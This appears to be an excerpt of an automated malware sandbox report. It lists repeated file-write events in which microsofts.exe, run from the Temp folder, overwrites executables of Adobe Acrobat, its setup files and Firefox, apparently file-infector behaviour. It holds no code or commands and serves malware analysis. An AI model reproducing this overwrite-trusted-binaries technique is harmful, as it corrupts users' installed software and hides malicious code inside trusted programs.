                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
